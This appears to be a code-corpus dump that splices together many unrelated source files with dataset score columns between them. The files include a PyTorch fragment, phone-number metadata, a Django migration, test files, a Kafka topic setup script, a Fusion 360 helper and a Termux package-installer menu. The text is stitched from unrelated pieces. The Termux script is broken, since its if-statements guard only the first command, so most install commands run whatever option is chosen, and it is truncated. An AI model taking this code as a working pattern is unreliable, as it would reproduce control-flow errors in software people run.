x = self.output_layer(x)
x = x.view(-1, self._out_dim, self._atoms)
x = F.softmax(x, dim=-1)
x = x.clamp(min=1e-3)
return x
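# DistributionalMLP follows the C51-style parameterization: dist() returns a probability
# vector over `atoms` fixed support points per action, and forward() collapses it to
# Q(s, a) = sum_i p_i(s, a) * z_i via `torch.sum(x * self._supports, dim=2)`.
# Minimal sketch (shapes are illustrative):
#   supports = torch.linspace(-10.0, 10.0, 51)
#   net = DistributionalMLP(in_dim=(4,), out_dim=2, supports=supports)
#   q_values = net(torch.randn(8, 4))  # shape (8, 2)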
| 2.859375 | 3 |
phonenumbers/data/region_AC.py | ayushgoel/FixGoogleContacts | 2 | 11045 | """Auto-generated file, do not edit by hand. AC metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_AC = PhoneMetadata(id='AC', country_code=247, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[2-467]\\d{3}', possible_number_pattern='\\d{4}'),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:[267]\\d|3[0-5]|4[4-69])\\d{2}', possible_number_pattern='\\d{4}', example_number='6889'),
mobile=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='911', possible_number_pattern='\\d{3}', example_number='911'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'))
| 1.882813 | 2 |
awx/main/migrations/0156_capture_mesh_topology.py | ziegenberg/awx | 1 | 11046 | <reponame>ziegenberg/awx
# Generated by Django 2.2.20 on 2021-12-17 19:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0155_improved_health_check'),
]
operations = [
migrations.AlterField(
model_name='instance',
name='node_type',
field=models.CharField(
choices=[
('control', 'Control plane node'),
('execution', 'Execution plane node'),
('hybrid', 'Controller and execution'),
('hop', 'Message-passing node, no execution capability'),
],
default='hybrid',
max_length=16,
),
),
migrations.CreateModel(
name='InstanceLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='main.Instance')),
('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reverse_peers', to='main.Instance')),
],
options={
'unique_together': {('source', 'target')},
},
),
migrations.AddField(
model_name='instance',
name='peers',
field=models.ManyToManyField(through='main.InstanceLink', to='main.Instance'),
),
]
| 1.75 | 2 |
models/dsd/bicubic.py | VinAIResearch/blur-kernel-space-exploring | 93 | 11047 | import torch
from torch import nn
from torch.nn import functional as F
class BicubicDownSample(nn.Module):
def bicubic_kernel(self, x, a=-0.50):
"""
This equation is exactly copied from the website below:
https://clouard.users.greyc.fr/Pantheon/experiments/rescaling/index-en.html#bicubic
"""
abs_x = torch.abs(x)
if abs_x <= 1.0:
return (a + 2.0) * torch.pow(abs_x, 3.0) - (a + 3.0) * torch.pow(abs_x, 2.0) + 1
elif 1.0 < abs_x < 2.0:
return a * torch.pow(abs_x, 3) - 5.0 * a * torch.pow(abs_x, 2.0) + 8.0 * a * abs_x - 4.0 * a
else:
return 0.0
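    # The piecewise function above is the standard Keys cubic-convolution kernel
    # (a = -0.5 corresponds to the Catmull-Rom spline):
    #   W(x) = (a + 2)|x|^3 - (a + 3)|x|^2 + 1    for |x| <= 1
    #   W(x) = a|x|^3 - 5a|x|^2 + 8a|x| - 4a      for 1 < |x| < 2
    #   W(x) = 0                                  otherwise
    # forward() applies it separably: one vertical 1-D convolution, then one horizontal one.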
def __init__(self, factor=4, cuda=True, padding="reflect"):
super().__init__()
self.factor = factor
size = factor * 4
k = torch.tensor(
[self.bicubic_kernel((i - torch.floor(torch.tensor(size / 2)) + 0.5) / factor) for i in range(size)],
dtype=torch.float32,
)
k = k / torch.sum(k)
# k = torch.einsum('i,j->ij', (k, k))
k1 = torch.reshape(k, shape=(1, 1, size, 1))
self.k1 = torch.cat([k1, k1, k1], dim=0)
k2 = torch.reshape(k, shape=(1, 1, 1, size))
self.k2 = torch.cat([k2, k2, k2], dim=0)
self.cuda = ".cuda" if cuda else ""
self.padding = padding
for param in self.parameters():
param.requires_grad = False
def forward(self, x, nhwc=False, clip_round=False, byte_output=False):
# x = torch.from_numpy(x).type('torch.FloatTensor')
filter_height = self.factor * 4
filter_width = self.factor * 4
stride = self.factor
pad_along_height = max(filter_height - stride, 0)
pad_along_width = max(filter_width - stride, 0)
filters1 = self.k1.type("torch{}.FloatTensor".format(self.cuda))
filters2 = self.k2.type("torch{}.FloatTensor".format(self.cuda))
# compute actual padding values for each side
pad_top = pad_along_height // 2
pad_bottom = pad_along_height - pad_top
pad_left = pad_along_width // 2
pad_right = pad_along_width - pad_left
# apply mirror padding
if nhwc:
x = torch.transpose(torch.transpose(x, 2, 3), 1, 2) # NHWC to NCHW
# downscaling performed by 1-d convolution
x = F.pad(x, (0, 0, pad_top, pad_bottom), self.padding)
x = F.conv2d(input=x, weight=filters1, stride=(stride, 1), groups=3)
if clip_round:
x = torch.clamp(torch.round(x), 0.0, 255.0)
x = F.pad(x, (pad_left, pad_right, 0, 0), self.padding)
x = F.conv2d(input=x, weight=filters2, stride=(1, stride), groups=3)
if clip_round:
x = torch.clamp(torch.round(x), 0.0, 255.0)
if nhwc:
x = torch.transpose(torch.transpose(x, 1, 3), 1, 2)
if byte_output:
            return x.type("torch{}.ByteTensor".format(self.cuda))
else:
return x
| 2.703125 | 3 |
control/webapp/__init__.py | doismellburning/control-panel | 1 | 11048 | <gh_stars>1-10
import logging
from flask import Flask
from . import utils, home, member, society, signup, jobs, admin
from .flask_seasurf import SeaSurf
from flask_talisman import Talisman
app = Flask(__name__,
template_folder="../templates",
static_folder="../static")
app.config['CSRF_CHECK_REFERER'] = False
csrf = SeaSurf(app)
Talisman(app)
logging.basicConfig(level=logging.DEBUG if app.debug else logging.INFO)
utils.setup_app(app)
app.register_blueprint(home.bp)
app.register_blueprint(member.bp)
app.register_blueprint(society.bp)
app.register_blueprint(signup.bp)
app.register_blueprint(jobs.bp)
app.register_blueprint(admin.bp)
| 1.851563 | 2 |
tests/rules/test_duplicates.py | imbillu/arche | 1 | 11049 | <gh_stars>1-10
import arche.rules.duplicates as duplicates
from arche.rules.result import Level, Outcome
from conftest import create_result
import numpy as np
import pandas as pd
import pytest
unique_inputs = [
({}, {}, {Level.INFO: [(Outcome.SKIPPED,)]}),
(
{"id": ["0", "0", "1"]},
{"unique": ["id"]},
{
Level.ERROR: [
("id contains 1 duplicated value(s)", None, {"same '0' `id`": [0, 1]})
]
},
),
(
{
"id": ["47" for x in range(6)],
"name": ["Walt", "Juan", "Juan", "Walt", "Walt", "John"],
},
{"unique": ["id", "name"]},
{
Level.ERROR: [
(
"id contains 1 duplicated value(s)",
None,
{"same '47' `id`": [i for i in range(6)]},
),
(
"name contains 2 duplicated value(s)",
None,
{"same 'Juan' `name`": [1, 2], "same 'Walt' `name`": [0, 3, 4]},
),
]
},
),
({"name": ["a", "b"]}, {"unique": ["name"]}, {}),
]
@pytest.mark.parametrize("data, tagged_fields, expected_messages", unique_inputs)
def test_find_by_unique(data, tagged_fields, expected_messages):
df = pd.DataFrame(data)
assert duplicates.find_by_unique(df, tagged_fields) == create_result(
"Duplicates By **unique** Tag", expected_messages, items_count=len(df)
)
@pytest.mark.parametrize(
"data, columns, expected_messages",
[
(
{"id": ["0", "0", "1"]},
["id"],
{
Level.ERROR: [
("2 duplicate(s) with same id", None, {"same '0' `id`": [0, 1]})
]
},
),
({"id": ["0", "1", "2"]}, ["id"], {}),
(
{"id": [np.nan, "9", "9"], "city": [np.nan, "Talca", "Talca"]},
["id", "city"],
{
Level.ERROR: [
(
"2 duplicate(s) with same id, city",
None,
{"same '9' `id`, 'Talca' `city`": [1, 2]},
)
]
},
),
],
)
def test_find_by(data, columns, expected_messages):
df = pd.DataFrame(data)
assert duplicates.find_by(df, columns) == create_result(
"Duplicates", expected_messages, items_count=len(df)
)
@pytest.mark.parametrize(
"data, tagged_fields, expected_messages",
[
({}, {}, {Level.INFO: [(Outcome.SKIPPED,)]}),
(
{"name": ["bob", "bob", "bob", "bob"], "url": ["u1", "u1", "2", "u1"]},
{"name_field": ["name"], "product_url_field": ["url"]},
{
Level.ERROR: [
(
"3 duplicate(s) with same name, url",
None,
{"same 'bob' `name`, 'u1' `url`": [0, 1, 3]},
)
]
},
),
(
{"name": ["john", "bob"], "url": ["url1", "url1"]},
{"name_field": ["name"], "product_url_field": ["url"]},
{},
),
],
)
def test_find_by_name_url(data, tagged_fields, expected_messages):
df = pd.DataFrame(data)
result = duplicates.find_by_name_url(df, tagged_fields)
assert result == create_result(
"Duplicates By **name_field, product_url_field** Tags",
expected_messages,
items_count=len(df),
)
| 2.453125 | 2 |
Question_1.py | Queen-Jonnie/Work | 0 | 11050 | # This is the word list from where the answers for the hangman game will come from.
word_list = [
2015,
"<NAME>",
"Rwanda and Mauritius",
2,
"Dr, <NAME>",
"<NAME>",
"Madagascar",
94,
8,
"Mauritius"
]
# Here we are defining the variables 'Right' (incremented when they get a question correct) and
# 'tries' (incremented when they get a question wrong).
Right = 0
tries = 0
# The function below, when called, will greet the user by the name they input.
def greet(name):
print("Hello " + name + " welcome to hangman and good luck!")
user_name = input("What is your name?")
greet(user_name)
# The functions below check whether the user's guess is in the word_list or not and print the
# appropriate response; the calling code then adds to the 'Right' or 'tries' variable accordingly.
def alu(guess):
    if guess in word_list:
        print("congrats!")
        return True
    return False
def check(guess):
    if guess not in word_list:
        print("Wrong")
    return guess
guess1 = int(input("When was ALU founded?"))
if alu(guess1):
Right += 1
else:
check(guess1)
tries += 1
guess2 = input("Who is the CEO of ALU")
if alu(guess2):
Right += 1
else:
check(guess2)
tries += 1
guess3 = input("Where are ALU campuses?")
if alu(guess3):
Right += 1
else:
check(guess3)
tries += 1
guess4 = int(input("How many campuses does ALU have?"))
if alu(guess4):
Right += 1
else:
check(guess4)
tries += 1
guess5 = input("What is the name of ALU Rwanda's Dean?")
if alu(guess5):
Right += 1
else:
check(guess5)
tries += 1
guess6 = input("Who is in charge of Student Life?")
if alu(guess6):
Right += 1
else:
check(guess6)
tries += 1
if tries == 6:
exit("You lost")
guess7 = input("What is the name of our Lab?")
if alu(guess7):
Right += 1
else:
check(guess7)
tries += 1
if tries == 6:
exit("You lost")
guess8 = int(input("How many students do we have in Year 2 CS?"))
if alu(guess8):
Right += 1
else:
check(guess8)
tries += 1
if tries == 6:
exit("You lost")
guess9 = int(input("How many degrees does ALU offer?"))
if alu(guess9):
Right += 1
else:
check(guess9)
tries += 1
if tries == 6:
exit("You lost")
guess10 = input("Where are the headquarters of ALU?")
if alu(guess10):
Right += 1
else:
check(guess10)
tries += 1
if tries == 6:
exit("You lost")
| 4.28125 | 4 |
node-api/get-block-transfers/request.py | Venoox/casper-integrations | 5 | 11051 | <reponame>Venoox/casper-integrations
import json
import os
import pycspr
# A known casper test-net node address.
_NODE_ADDRESS = os.getenv("CASPER_NODE_ADDRESS", "192.168.127.12")
# A known block hash.
_BLOCK_HASH: bytes = bytes.fromhex("c7148e1e2e115d8fba357e04be2073d721847c982dc70d5c36b5f6d3cf66331c")
# A known block height.
_BLOCK_HEIGHT: int = 20652
def main():
"""Retrieves transfers by block.
"""
# Set client.
client = pycspr.NodeClient(pycspr.NodeConnectionInfo(host=_NODE_ADDRESS))
# Set block by known hash.
block_transers_1: tuple = client.queries.get_block_transfers(_BLOCK_HASH)
# Set block by known height.
block_transers_2: tuple = client.queries.get_block_transfers(_BLOCK_HEIGHT)
# Verify block information equivalence.
assert block_transers_1 == block_transers_2
print("-----------------------------------------------------------------------------------------------------")
print(f"QUERIED TEST-NET NODE {_NODE_ADDRESS}")
print("-----------------------------------------------------------------------------------------------------")
print(f"Block transfers = {json.dumps(block_transers_1, indent=4)}")
print("-----------------------------------------------------------------------------------------------------")
if __name__ == "__main__":
try:
main()
except Exception as err:
print(f"API ERROR @ NODE {_NODE_ADDRESS} :: {err}")
| 2.4375 | 2 |
tests/test_util.py | re3turn/twicrawler | 14 | 11052 | import nose2.tools
from typing import Union
from app.util import has_attributes
class SampleClass:
pass
class TestUtil:
@nose2.tools.params(
('SET_VALUE', True),
(None, False),
('NO_ATTRIBUTE', False),
(False, True),
('', True),
(0, True),
)
def test_has_attributes(self, value: Union[bool, int, str, None], ans: bool) -> None:
obj = SampleClass()
if value != 'NO_ATTRIBUTE':
setattr(obj, 'attr', value)
has_attr = has_attributes(obj, 'attr')
assert has_attr is ans
| 2.828125 | 3 |
commands/data/fusion_data.py | Christ0ph990/Fusion360DevTools | 3 | 11053 | # Copyright 2022 by Autodesk, Inc.
# Permission to use, copy, modify, and distribute this software in object code form
# for any purpose and without fee is hereby granted, provided that the above copyright
# notice appears in all copies and that both that copyright notice and the limited
# warranty and restricted rights notice below appear in all supporting documentation.
#
# AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS. AUTODESK SPECIFICALLY
# DISCLAIMS ANY IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE.
# AUTODESK, INC. DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
# UNINTERRUPTED OR ERROR FREE.
from dataclasses import dataclass, field
import base64
import pprint
import adsk.core
app = adsk.core.Application.get()
def b64_url_safe_encode(string):
encoded_bytes = base64.urlsafe_b64encode(string.encode("utf-8"))
encoded_str = str(encoded_bytes, "utf-8")
return encoded_str.rstrip("=")
def b64_url_safe_decode(string):
return str(base64.urlsafe_b64decode(string.lstrip('a.') + "==="), "utf-8")
def link_for_url(url: str) -> str:
return f"<a href={url}>{url}</a>"
@dataclass
class FusionData:
# This should be set at creation or at least validity checked BEFORE calling this
data_file: adsk.core.DataFile = field(repr=False, default=None)
    # The following are computed based on the current state of Fusion and are not "printed" by default
hub: adsk.core.DataHub = field(repr=False, init=False)
project: adsk.core.DataProject = field(repr=False, init=False)
folder: adsk.core.DataFolder = field(repr=False, init=False)
user: adsk.core.User = field(repr=False, init=False)
# All String Properties
file_name: str = field(init=False)
user_email: str = field(init=False)
hub_name: str = field(init=False)
hub_id: str = field(init=False)
hub_id_decoded: str = field(init=False)
hub_team_name: str = field(init=False)
project_name: str = field(init=False)
project_id: str = field(init=False)
project_id_decoded: str = field(init=False)
folder_name: str = field(init=False)
folder_id: str = field(init=False)
lineage_urn: str = field(init=False)
version_urn: str = field(init=False)
base64_lineage_urn: str = field(init=False)
base64_version_urn: str = field(init=False)
open_from_web: str = field(init=False)
fusion_team_url: str = field(init=False)
fusion_team_link: str = field(init=False)
def __post_init__(self):
        # The following are computed based on the current state of Fusion and are not "printed" by default
self.hub = app.data.activeHub
self.project = self.data_file.parentProject
self.folder = self.data_file.parentFolder
self.user = app.currentUser
# All String Properties
self.file_name: str = self.data_file.name
self.user_email: str = self.user.email
self.hub_name: str = self.hub.name
self.hub_id: str = self.hub.id
self.hub_id_decoded: str = b64_url_safe_decode(self.hub_id)
self.hub_team_name: str = self.hub_id_decoded.split(':')[-1]
self.project_name: str = self.project.name
self.project_id: str = self.project.id
self.project_id_decoded: str = b64_url_safe_decode(self.project_id)
self.folder_name: str = self.folder.name
self.folder_id: str = self.folder.id
self.lineage_urn: str = self.data_file.id
self.version_urn: str = self.data_file.versionId
self.base64_lineage_urn: str = b64_url_safe_encode(self.lineage_urn)
self.base64_version_urn: str = b64_url_safe_encode(self.version_urn)
team_base_url: str = 'autodesk360'
self.open_from_web: str = f"fusion360://userEmail={self.user_email}&" \
f"lineageUrn={self.lineage_urn}&" \
f"hubUrl=https://{self.hub_team_name}.{team_base_url}.com&" \
f"documentName={self.file_name}"
self.fusion_team_url: str = f"https://{self.hub_team_name}.{team_base_url}.com/g/data/{self.base64_lineage_urn}"
self.fusion_team_link = link_for_url(self.fusion_team_url)
def str_dict(self):
return {k: v
for k, v in self.__dict__.items()
if isinstance(v, str)}
def pretty_string(self):
return pprint.pformat(self.str_dict())
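# --- Editor's note: illustrative sketch, not part of the original module. FusionData itself needs a
# --- live Fusion 360 session (the adsk import above), but the base64 helpers can be exercised on a
# --- made-up URN; the value below is an invented example and should round-trip unchanged.
if __name__ == "__main__":
    sample_urn = "urn:adsk.wipprod:dm.lineage:abcdEFGH1234"
    encoded = b64_url_safe_encode(sample_urn)
    print(encoded)                        # URL-safe, padding stripped
    print(b64_url_safe_decode(encoded))   # expected to print the original URN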
| 2.015625 | 2 |
src/config-producer/config_topic.py | DougFigueroa/realde-kafka-assesment | 0 | 11054 | """
This process creates the two kafka topics to be used.
The input-topic with ten partitions and the output-topic with one partition.
Also preloads the kafka cluster with test data (if flag is set to true).
"""
import os
import time
import json
import logging
from confluent_kafka.admin import AdminClient, NewTopic
from confluent_kafka import Producer
# defining logger
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# reading the environment variables defined in the docker compose file
KAFKA_CLUSTER = os.environ.get('KAFKA_CLUSTER_CONNECT', 'localhost:9092')
LOAD_DATA = os.environ.get('LOAD_SAMPLE_DATA', False)
logging.info(
(f'>Env variables: KAFKA_CLUSTER_CONNECT={KAFKA_CLUSTER} '
f'LOAD_SAMPLE_DATA={LOAD_DATA}'))
BROKER_CONFIG = {'bootstrap.servers': KAFKA_CLUSTER}
def read_json_file(file_route: str) -> dict:
"""
Read the json configuration file to set topics and partitions.
Args:
- str, the route(with name) of the configuration file.
Returns:
- dict, with the configurations defined on the json file.
"""
with open(file_route, 'r') as f:
config = json.load(f)
logging.info('JSON file readed.')
return config
def create_topics(admin: object, config: dict) -> None:
"""Create the kafka topics based on the configuration file.
Args:
- object, the admin client kafka object.
- dict, json configuration of the process.
Returns: None.
"""
# read the topic configuration and create the NewTopic objects
topics = []
for k, v in config.items():
topics.append(NewTopic(
v['topic_name'],
num_partitions=v['partitions_quantity'],
replication_factor=1
)
)
logging.info(f'Starting the creation of the topics: {topics}...')
creation_response = admin.create_topics(topics)
    # the response has futures (which run asynchronously) so we validate them
# to see if they succeeded or not
for topic, f in creation_response.items():
try:
f.result()
logging.info(f'Creation of the topic {topic} completed.')
except Exception as e:
logger.error(f'Error creating the kafka topic: {topic}. {e}')
raise Exception(f'Error creating the kafka topic: {topic}. {e}')
def list_topics_and_config(admin: object) -> None:
    """Check the topics that exist on the broker
    and display other configs of the Kafka cluster.
Args:
- object, the admin client kafka object.
Returns: None.
"""
list_response = admin.list_topics(timeout=5)
# get all the broker info
logging.info('>Broker details:')
for counter, broker in enumerate(list_response.brokers.items(), start=1):
logging.info(f'{counter}-Broker info: {broker}')
logging.info('>Topics details:')
# get all the topic names
for counter, topic_data in enumerate(list_response.topics.items(), start=1):
logging.info(f'{counter}-Topic info: {topic_data}')
def load_sample_data(topic: str, sample_data: list) -> None:
"""Loads the sample data to the input kafka topic.
This will load data across 10 different partitions.
Args:
- str, the topic name where the data is going to be loaded.
- list, the sample data to be loaded by the producer across
all the partitions of the specified topic.
Returns: None
"""
producer = Producer(BROKER_CONFIG)
# iterate through partitions
for data in sample_data:
for number in data['values']:
try:
producer.produce(topic, str(number), None, data['partition'])
except Exception as e:
logger.error(
f'Producer failed to produce a message to the topic. {e}')
raise Exception(
                    f'Failed to produce a message to Kafka. {e}')
producer.poll(0)
    # make sure all queued messages have been delivered
producer.flush()
    logging.info('Data successfully produced and loaded to the specified topic.')
def main() -> None:
    """Orchestrates the whole process execution,
    from configuring the cluster topics to loading the sample input data.
"""
configuration_file = 'topic_config.json'
data_file = 'sample_data.json'
time.sleep(5)
actual_path = os.path.dirname(__file__)
configuration_path = os.path.join(actual_path, configuration_file)
data_path = os.path.join(actual_path, data_file)
config = read_json_file(configuration_path)
# defining the admin client needed to create topics
admin = AdminClient(BROKER_CONFIG)
create_topics(admin, config)
# this step its only for validation purposes
list_topics_and_config(admin)
# start the load of the sample data to the input topic
if LOAD_DATA:
in_topic_name = config['in_topic_conf']['topic_name']
sample_data = read_json_file(data_path)
load_sample_data(in_topic_name, sample_data)
if __name__ == '__main__':
main()
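# --- Editor's note: the JSON shapes below are inferred from how the code indexes into the config and
# --- sample data, and are illustrative only (the "out_topic_conf" key name is an assumption; only
# --- "in_topic_conf" is referenced explicitly above). topic_config.json:
# {
#     "in_topic_conf":  {"topic_name": "input-topic",  "partitions_quantity": 10},
#     "out_topic_conf": {"topic_name": "output-topic", "partitions_quantity": 1}
# }
# sample_data.json is a list of per-partition payloads consumed by load_sample_data():
# [
#     {"partition": 0, "values": [1, 2, 3]},
#     {"partition": 1, "values": [4, 5, 6]}
# ]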
| 2.734375 | 3 |
deallocate/params.py | jefferycwc/tacker-example-plugin | 0 | 11055 | OS_MA_NFVO_IP = '192.168.1.197'
OS_USER_DOMAIN_NAME = 'Default'
OS_USERNAME = 'admin'
OS_PASSWORD = '<PASSWORD>'
OS_PROJECT_DOMAIN_NAME = 'Default'
OS_PROJECT_NAME = 'admin' | 1.125 | 1 |
anoplura/patterns/body_part.py | rafelafrance/traiter_lice | 0 | 11056 | <gh_stars>0
"""Extract body part annotations."""
import re
import spacy
from traiter.const import COMMA
from traiter.patterns.matcher_patterns import MatcherPatterns
from anoplura.pylib.const import COMMON_PATTERNS
from anoplura.pylib.const import CONJ
from anoplura.pylib.const import MISSING
from anoplura.pylib.const import REPLACE
JOINER = CONJ + COMMA
JOINER_RE = "|".join(JOINER + [r"\s"])
JOINER_RE = re.compile(rf"\b(?:{JOINER_RE})\b", flags=re.IGNORECASE)
MISSING_RE = "|".join([fr"\b{m}\b" for m in MISSING])
MISSING_RE = re.compile(MISSING_RE, flags=re.IGNORECASE)
BODY_PART = MatcherPatterns(
"body_part",
on_match="anoplura.body_part.v1",
decoder=COMMON_PATTERNS
| {
"seg": {"ENT_TYPE": "segmented"},
"ord": {"ENT_TYPE": {"IN": ["ordinal", "number_word"]}},
},
patterns=[
"missing part+",
"missing? any_part* part",
"part+ &/,/or* part* &/,/or* part+",
"part+ ord -? ord",
"part+ 99? -? 99",
"part+ ord?",
"part+ 99?",
"part+ ord -? seg",
"part+ 99 -? seg",
"ord? -? seg? part+",
"99 - seg part+",
],
)
@spacy.registry.misc(BODY_PART.on_match)
def body_part(ent):
"""Enrich a body part span."""
data = {}
parts = JOINER_RE.split(ent.text.lower())
parts = [REPLACE.get(p, p) for p in parts]
text = " ".join(parts)
text = re.sub(r"\s*-\s*", "-", text)
text = REPLACE.get(text, text)
if MISSING_RE.search(ent.text.lower()) is not None:
data["missing"] = True
data["body_part"] = text
ent._.data = data
| 2.375 | 2 |
Termux-pkg-apt.py | Hironotori/Termux-pkg-apt | 1 | 11057 | #!/usr/bin/python3
import os
import time
import sys
os.system("clear")
print('''\033[91m
CREATED BY Hironotori
''')
def slowprint(s):
    for c in s + '\n' :
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(0.05)  # assumed per-character delay; the time import was otherwise unused
slowprint(''' \033[93m
[1] apt-pkg pip-pip3 [2] apt-pkg python
[3] apt-pkg python2 [4] apt-pkg bash
[5] apt-pkg git [6] apt-pkg perl
[7] apt-pkg nano [8] apt-pkg curl
[9] apt-pkg openssl [10] apt-pkg openssh
[11] apt-pkg wget [12] apt-pkg clang
[13] apt-pkg nmap [14] apt-pkg w3m
[15] apt-pkg ruby [16] apt-pkg dnsutils
[17] apt-pkg coreutils [18] apt-pkg fish.
[19] apt-pkg zip [20] apt-pkg figlet.
[21] apt-pkg cowsay [22] apt-pkg unzip.
[23] apt-pkg vim [24] apt-pkg wcalc.
[25] apt-pkg bmon [26] apt-pkg unrar.
[27] apt-pkg proot [28] apt-pkg golang.
[29] apt-pkg tsu [30] apt-pkg tor.
[31] apt-pkg php
[00] Install everything at once [0] Exit''')
print (" ")
choice = input("\033[93mSelect an option : ")
if choice == '0' : sys.exit()
if choice == '1' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system("python -m pip install --upgrade pip")
os.system ("pip3 install --upgrade setuptools pip")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '2' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install python -y")
os.system ("pkg upgrade python -y")
os.system ("apt install python -y")
os.system ("apt upgrade python -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '3' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install python2 -y")
os.system ("pkg upgrade python2 -y")
os.system ("apt install python2 -y")
os.system ("apt upgrade python2 -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '4' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install bash")
os.system ("apt install bash")
os.system ("pkg upgrade bash")
os.system ("apt upgrade bash")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '5' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("apt install git -y")
os.system ("pkg install git -y")
os.system ("pkg upgrade git -y")
os.system ("apt upgrade git -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '6' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install perl -y")
os.system ("apt install perl -y")
os.system ("pkg upgrade perl -y")
os.system ("apt upgrade perl -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '7' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install nano -y")
os.system ("apt install nano -y")
os.system ("pkg upgrade nano -y")
os.system ("apt upgrade nano -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '8' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install curl -y")
os.system ("apt install curl -y")
os.system ("pkg upgrade curl -y")
os.system ("apt upgrade curl -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '9' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install openssl -y")
os.system ("apt install openssl -y")
os.system ("pkg upgrade openssl -y")
os.system ("apt upgrade openssl -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '10' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install openssh -y")
os.system ("apt install openssh -y")
os.system ("pkg upgrade openssh -y")
os.system ("apt upgrade openssh -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '11' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install wget -y")
os.system ("apt install wget -y")
os.system ("pkg upgrade wget -y")
os.system ("apt upgrade wget -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '12' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install clang -y")
os.system ("apt install clang -y")
os.system ("pkg upgrade clang -y")
os.system ("apt upgrade clang -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '13' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install nmap -y")
os.system ("apt install nmap -y")
os.system ("pkg upgrade nmap -y")
os.system ("apt upgrade nmap -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '14' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install w3m -y")
os.system ("apt install w3m -y")
os.system ("pkg upgrade w3m -y")
os.system ("apt upgrade w3m -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '15' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install ruby -y")
